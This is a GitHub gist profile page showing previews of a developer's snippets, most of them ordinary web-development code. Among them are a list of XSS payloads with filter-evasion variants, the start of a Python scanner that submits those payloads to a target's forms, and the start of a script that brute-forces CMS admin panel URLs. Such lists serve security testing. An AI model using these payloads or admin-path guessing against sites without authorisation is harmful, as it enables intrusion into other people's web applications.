Skip to content

Instantly share code, notes, and snippets.

View richardevcom's full-sized avatar
👾

richardev richardevcom

👾
View GitHub Profile
@richardevcom
richardevcom / add-opendkim-key.sh
Created April 12, 2022 22:57
Create Signing Table, Key Table, Trusted Hosts File and test DKIM key.
View add-opendkim-key.sh
#!/bin/bash
# Which domain?
get_domain(){
printf "\n"
read -p "Domain: " DOMAIN
}
# Is domain set?
domain_is_set(){
@richardevcom
richardevcom / wp-update-urls.sql
Created August 31, 2020 00:54
Update WordPress URLs via SQL
View wp-update-urls.sql
UPDATE wp_options SET option_value = replace(option_value, 'http://www.oldurl', 'http://www.newurl') WHERE option_name = 'home' OR option_name = 'siteurl';
UPDATE wp_posts SET guid = replace(guid, 'http://www.oldurl','http://www.newurl');
UPDATE wp_posts SET post_content = replace(post_content, 'http://www.oldurl', 'http://www.newurl');
UPDATE wp_postmeta SET meta_value = replace(meta_value,'http://www.oldurl','http://www.newurl');
@richardevcom
richardevcom / xss-naughty-list.txt
Created May 14, 2020 05:03
Naughty XSS list with most popular exploits.
View xss-naughty-list.txt
<script>alert(123)</script>
&lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;
<img src=x onerror=alert(123) />
<svg><script>123<1>alert(123)</script>
"><script>alert(123)</script>
'><script>alert(123)</script>
><script>alert(123)</script>
</script><script>alert(123)</script>
< / script >< script >alert(123)< / script >
onfocus=JaVaSCript:alert(123) autofocus
@richardevcom
richardevcom / scan-stored-xss.py
Created May 14, 2020 04:59
Scan for Stored XSS vulnerabilities in multiple forms & inputs using exploit list
View scan-stored-xss.py
import requests
import argparse
import sys
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
""" Prepare arguments for script parse """
parser = argparse.ArgumentParser(description="Detect if target is vulnerable to XSS!?")
parser.add_argument('-u', dest='url', type=str, help="Target URL")
@richardevcom
richardevcom / get_admin_url.py
Last active January 27, 2020 08:19
Find Prestashop, WordPress or other CMS admin control panel URL with Python
View get_admin_url.py
import itertools
import string
import urllib2
def guess_admin_url(url, prefix):
adminurl = url + prefix
chars = string.ascii_lowercase + string.digits
attempts = 0
for password_length in range(1, 9):
for guess in itertools.product(chars, repeat=password_length):
@richardevcom
richardevcom / functions.php
Last active June 12, 2020 01:05
WordPress enable SVG mime-type
View functions.php
<?php
/**
* Enable SVG mime-type
*/
add_filter('upload_mimes', function($mimes){
$mimes['svg'] = 'image/svg+xml';
return $mimes;
});
@richardevcom
richardevcom / demo.css
Last active January 27, 2020 08:20
Interactive particles canvas generated from image
View demo.css
body {
background: #000000;
}
#dots {
position: absolute;
top: 50%;
left: 50%;
margin-top: -95px;
margin-left: -375px;
@richardevcom
richardevcom / resize.js
Created November 8, 2019 10:59
window before / on / after resize event
View resize.js
var resizeTimer;
var timeoutInterval = 100; // Timeout interval for resize timer
window.onresize = function(event) {
var status = document.getElementById("status");
// ON RESIZING
status.innerHTML = "Resizing...";
clearTimeout(resizeTimer);
@richardevcom
richardevcom / free_email_provider_domains.txt
Created June 5, 2018 04:41 — forked from tbrianjones/free_email_provider_domains.txt
A list of free email provider domains. Some of these are probably not around anymore. I've combined a dozen lists from around the web. Current "major providers" should all be in here as of the date this is created.
View free_email_provider_domains.txt
1033edge.com
11mail.com
123.com
123box.net
123india.com
123mail.cl
123qwe.co.uk
150ml.com
15meg4free.com
163.com